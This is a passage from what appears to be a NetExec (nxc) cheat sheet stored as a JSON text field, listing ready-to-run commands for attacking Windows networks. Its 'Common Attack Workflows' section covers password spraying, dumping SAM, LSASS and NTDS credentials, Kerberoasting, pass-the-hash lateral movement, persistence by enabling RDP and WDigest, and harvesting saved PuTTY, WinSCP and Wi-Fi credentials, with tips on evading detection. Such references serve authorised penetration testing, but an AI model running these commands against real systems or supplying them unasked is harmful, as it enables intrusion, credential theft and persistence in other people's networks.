-u admin -p pass --no-output -x \"command\"\n```\n\n### WMI Modules\n\n#### LOW PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u user -p pass -M ioxidresolver              # Additional interfaces\nnxc wmi 192.168.1.10 -u user -p pass -M spooler            
        # Print spooler\nnxc wmi 192.168.1.10 -u user -p pass -M zerologon                  # Zerologon check\n```\n\n#### HIGH PRIVILEGE MODULES\n```bash\nnxc wmi 192.168.1.10 -u admin -p pass -M bitlocker                 # BitLocker status\nnxc wmi 192.168.1.10 -u admin -p pass -M enum_dns                  # DNS records\nnxc wmi 192.168.1.10 -u admin -p pass -M get_netconnections        # Network connections\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable      # Enable RDP\nnxc wmi 192.168.1.10 -u admin -p pass -M rdp -o ACTION=disable     # Disable RDP\n```\n\n---\n\n## General Flags & Options\n\n### Threading & Performance\n```bash\n-t 256                       # Number of threads (default: 256)\n--timeout 10                 # Connection timeout in seconds\n--jitter 5                   # Random delay between requests (seconds)\n```\n\n### Output & Logging\n```bash\n--verbose                    # Verbose output\n--debug                      # Debug mode\n--log output.log             # Save output to file\n--no-progress                # Disable progress bar\n```\n\n### DNS Options\n```bash\n-6                           # Force IPv6\n--dns-server 8.8.8.8         # Custom DNS server\n--dns-tcp                    # Use TCP for DNS queries\n--dns-timeout 3              # DNS timeout in seconds\n```\n\n### Credential Database\n```bash\n-id 1                        # Use credential ID from database\n-id 1 2 3                    # Use multiple credential IDs\n```\n\n### Server Options\n```bash\n--server https               # Use HTTPS server (default)\n--server http                # Use HTTP server\n--server-host 0.0.0.0        # Bind server to IP\n--server-port 8000           # Server port\n--connectback-host IP        # Connectback IP for remote system\n```\n\n### Database\n```bash\ncmedb                        # Access NXC database\nexport smb                   # Export SMB results\n```\n\n### Modules\n```bash\nnxc smb -L                    
          # List all SMB modules\nnxc smb -M  --options           # Show module options\n```\n\n---\n\n## Common Attack Workflows\n\n### 1. Initial Enumeration\n```bash\n# Find hosts and check SMB signing\nnxc smb 192.168.1.0/24 --gen-relay-list relay.txt\n\n# Anonymous/Guest enumeration\nnxc smb 192.168.1.0/24 -u '' -p ''\nnxc smb 192.168.1.0/24 -u 'guest' -p ''\n\n# Check multiple protocols\nnxc smb 192.168.1.0/24\nnxc rdp 192.168.1.0/24 -u '' -p ''\nnxc winrm 192.168.1.0/24 -u '' -p ''\n```\n\n### 2. Password Spraying\n```bash\n# Single password spray (safe)\nnxc smb targets.txt -u users.txt -p 'Winter2024!' -d DOMAIN --continue-on-success\n\n# With fail limits\nnxc smb targets.txt -u users.txt -p passwords.txt --ufail-limit 3 --fail-limit 5\n\n# Check valid creds across multiple protocols\nnxc smb 192.168.1.10 -u admin -p pass\nnxc winrm 192.168.1.10 -u admin -p pass\nnxc mssql 192.168.1.10 -u admin -p pass\nnxc rdp 192.168.1.10 -u admin -p pass\n```\n\n### 3. Credential Dumping\n```bash\n# Local SAM\nnxc smb 192.168.1.10 -u admin -p pass --sam\n\n# LSASS memory\nnxc smb 192.168.1.10 -u admin -p pass -M lsassy\nnxc smb 192.168.1.10 -u admin -p pass -M nanodump\n\n# Domain Controller NTDS\nnxc smb dc01.domain.local -u admin -p pass --ntds\nnxc smb dc01.domain.local -u admin -p pass --ntds --enabled\n\n# DPAPI\nnxc smb 192.168.1.10 -u admin -p pass --dpapi cookies\n```\n\n### 4. Domain Enumeration\n```bash\n# Users and groups\nnxc ldap dc01.domain.local -u user -p pass --users --groups\n\n# Kerberoastable accounts\nnxc ldap dc01.domain.local -u user -p pass --kerberoasting kerberoast.txt\n\n# ASREProastable accounts\nnxc ldap dc01.domain.local -u user -p pass --asreproast asrep.txt\n\n# Bloodhound data\nnxc ldap dc01.domain.local -u user -p pass --bloodhound -c All\n\n# Find vulnerabilities\nnxc ldap dc01.domain.local -u user -p pass -M adcs\nnxc ldap dc01.domain.local -u user -p pass -M laps\n```\n\n### 5. 
Lateral Movement\n```bash\n# Pass-the-Hash\nnxc smb targets.txt -u admin -H  -x \"hostname\"\n\n# Execute on multiple targets\nnxc smb targets.txt -u admin -p pass -x \"whoami\"\nnxc winrm targets.txt -u admin -p pass -x \"ipconfig\"\n\n# Spray hashes\nnxc smb targets.txt -u users.txt -H hashes.txt --continue-on-success\n```\n\n### 6. Post-Exploitation\n```bash\n# Persistence\nnxc smb 192.168.1.10 -u admin -p pass -M rdp -o ACTION=enable\nnxc smb 192.168.1.10 -u admin -p pass -M wdigest -o ACTION=enable\n\n# Credential hunting\nnxc smb 192.168.1.10 -u admin -p pass -M spider_plus\nnxc smb 192.168.1.10 -u admin -p pass -M gpp_password\nnxc smb 192.168.1.10 -u admin -p pass -M keepass_discover\n\n# Application credentials\nnxc smb 192.168.1.10 -u admin -p pass -M putty\nnxc smb 192.168.1.10 -u admin -p pass -M winscp\nnxc smb 192.168.1.10 -u admin -p pass -M wifi\n```\n\n---\n\n## Tips & Best Practices\n\n- Use `--continue-on-success` for password spraying to find all valid credentials\n- Use `--no-bruteforce` to stop after first valid credential per host (avoid lockouts)\n- Add `--jitter` to introduce random delays and avoid detection\n- Use `--ufail-limit` and `--fail-limit` to prevent account lockouts\n- Check SMB signing with basic scan before relay attacks\n- Use LDAP for domain enumeration (less noisy than SMB)\n- Pass-the-Hash only needs NTLM hash (not LM)\n- Always specify `-d DOMAIN` or `--local-auth` explicitly\n- Use `cmedb` to review all findings in the database\n- Module options: `-M module_name -o OPTION=value`\n- Rate limit yourself to avoid account lockouts and detection\n- Use `--no-progress` when logging output to files\n- Test authentication across multiple protocols (SMB, WinRM, RDP, MSSQL)\n\n---\n\n## Resources\n\n- **GitHub**: https://github.com/Pennyw0rth/NetExec\n- **Wiki**: https://www.netexec.wiki/\n- **Modules**: https://www.netexec.wiki/getting-started/using-modules", "creation_timestamp": "2026-05-26T06:17:22.000000Z"}